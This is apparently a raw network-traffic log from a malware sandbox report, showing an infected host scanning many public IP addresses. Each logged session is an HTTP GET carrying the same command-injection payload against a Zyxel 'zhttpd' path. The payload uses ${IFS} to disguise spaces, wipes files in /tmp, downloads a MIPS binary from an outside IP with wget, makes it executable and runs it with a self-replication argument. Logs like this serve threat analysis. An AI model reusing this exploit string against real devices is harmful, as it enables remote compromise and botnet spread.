                                              Jan 29, 2024 07:03:17.639322996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              609192.168.2.143346644.155.44.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639358997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              610192.168.2.1454870147.65.121.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639421940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              611192.168.2.1447996168.115.192.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639446020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              612192.168.2.1460190122.170.80.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639473915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              613192.168.2.144508463.79.121.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639523983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              614192.168.2.1435084223.137.76.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639560938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              615192.168.2.1459038116.223.211.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639590025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              616192.168.2.145145680.1.205.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639635086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              617192.168.2.145638877.83.137.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639668941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              618192.168.2.1438068137.223.37.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639818907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              619192.168.2.1458556129.125.72.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639890909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              620192.168.2.1445426154.74.110.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:17.639941931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              621192.168.2.1437602187.150.199.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:18.643556118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              622192.168.2.143925843.89.208.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:18.643604994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              623192.168.2.144586638.242.94.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:18.643646002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              624192.168.2.1438548186.214.190.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:19.647655964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              625192.168.2.143946297.47.43.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:19.647711039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              626192.168.2.143518289.84.86.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:19.647742033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              627192.168.2.1443088122.214.79.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:19.647828102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              628192.168.2.1433278105.132.14.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:19.647849083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              629192.168.2.1457930102.58.54.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:20.651330948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              630192.168.2.143633079.145.236.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:21.655033112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              631192.168.2.1446042122.51.126.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:21.655072927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              632192.168.2.144343680.136.32.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:21.655093908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              633192.168.2.1437638206.105.119.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:21.655148029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              634192.168.2.144607495.63.16.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:21.655201912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              635192.168.2.143796842.71.142.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:21.655244112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              636192.168.2.1450196151.184.250.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:21.655267954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              637192.168.2.1435698221.19.66.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:21.655350924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              638192.168.2.1435130139.162.51.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:21.655373096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              639192.168.2.1452084218.221.248.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:22.659200907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              640192.168.2.1457340115.122.16.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:22.659235954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              641192.168.2.1439376210.42.58.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:22.659291029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              642192.168.2.144341853.188.3.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:22.659307003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              643192.168.2.1435136140.94.136.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:22.659390926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              644192.168.2.145828458.29.75.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:23.662384033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              645192.168.2.1450940140.46.110.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:23.662436008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              646192.168.2.1434394205.122.85.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:23.662472963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              647192.168.2.1436860172.8.137.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:23.662514925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              648192.168.2.1448132223.68.200.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:23.662518024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              649192.168.2.1438512198.231.207.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:23.662559032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              650192.168.2.1449038201.209.96.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:23.662591934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              651192.168.2.1459682207.7.101.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:23.662640095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              652192.168.2.143737262.97.188.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:23.662776947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              653192.168.2.145008618.163.137.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:23.662802935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              654192.168.2.1439982168.146.145.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:23.662853003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              655192.168.2.1444926159.1.24.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:23.662853003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              656192.168.2.145920677.241.110.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:24.667145967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              657192.168.2.1433320172.87.241.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:24.667185068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              658192.168.2.1440326107.56.102.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:24.667211056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              659192.168.2.144393660.111.196.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:24.667263031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              660192.168.2.1455872169.104.203.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:24.667290926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              661192.168.2.145517660.92.166.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:24.667398930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              662192.168.2.145995612.254.121.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:25.670901060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              663192.168.2.1454176145.221.62.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:25.670943022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              664192.168.2.144017867.51.66.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:25.671005011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              665192.168.2.1460904223.124.196.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:25.671015978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              666192.168.2.143781443.227.249.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:25.671135902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              667192.168.2.144942065.220.234.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:25.671180964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              668192.168.2.144045673.254.242.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:25.671236038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              669192.168.2.143372823.53.11.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:26.675308943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              670192.168.2.1451046102.46.236.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:26.675362110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              671192.168.2.1445634161.255.143.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:26.675420046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              672192.168.2.144818841.176.35.138443
                                              TimestampBytes transferredDirectionData
